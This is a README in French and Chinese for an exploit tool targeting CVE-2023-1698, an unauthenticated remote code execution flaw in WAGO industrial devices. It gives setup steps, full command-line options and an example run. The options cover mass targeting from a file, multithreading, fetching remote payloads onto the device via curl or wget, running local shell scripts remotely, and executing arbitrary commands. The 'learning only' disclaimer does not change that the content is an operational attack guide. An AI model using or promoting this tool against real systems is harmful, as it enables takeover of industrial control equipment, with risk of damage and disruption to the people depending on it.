
Vulnérabilité d'exécution de code à distance dans le système WAGO (CVE-2023-1698)
WAGO系统远程代码执行漏洞(CVE-2023-1698)
J'ai développé un outil pour les tests locaux et le développement de POC, qui est uniquement destiné à une référence d'apprentissage technique. Veuillez ne pas l'utiliser à des fins illégales. Toutes les conséquences et pertes directes ou indirectes causées par des individus ou des organisations utilisant les informations fournies dans cet article relèvent de la responsabilité de l'utilisateur lui-même et n'ont rien à voir avec l'auteur !!!

WAGO est une entreprise spécialisée dans l'interconnexion électrique, l'automatisation et la technologie électronique d'interface. Dans plusieurs produits de WAGO, une vulnérabilité permet à des attaquants distants non authentifiés de créer de nouveaux utilisateurs et de modifier les configurations des appareils, ce qui peut conduire à une exécution de code à distance (RCE), à un déni de service et à des dommages sur l'ensemble du système.
pip install -r requirements.txt
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
[--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
[--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]
WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Enter target object
-f FILE, --file FILE Input target object file
--remote-file-include REMOTE_FILE_INCLUDE
Enter the filepath(it must be On the public network)
--local-file-include LOCAL_FILE_INCLUDE
Enter the filepath(it must be On the local)
--remote-command REMOTE_COMMAND
Enter the command you want to execute
--random-agent RANDOM_AGENT
Using random user agents
-d DELAY, --delay DELAY
Set multi threaded access latency (setting range from 0 to 5)
-t THREAD, --thread THREAD
Set the number of program threads (setting range from 1 to 50)
--proxy PROXY Set up the proxy
--type TYPE Set up the remote upload file type
-o OUTPUT, --output OUTPUT
output filename
--remote-file-include,指定远程文件URL,会通过curl或者wget将文件上传到tmp目录或者当前目录, Spécifiez une URL de fichier distant, qui téléchargera le fichier dans le répertoire tmp ou le répertoire actuel via curl ou wget --local-file-include,解析本地的shell脚本文件并在远端执行,Analysez les fichiers de script shell locaux et exécutez-les à distance --remote-command REMOTE 执行一条系统命令,Exécutez une commande système
python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"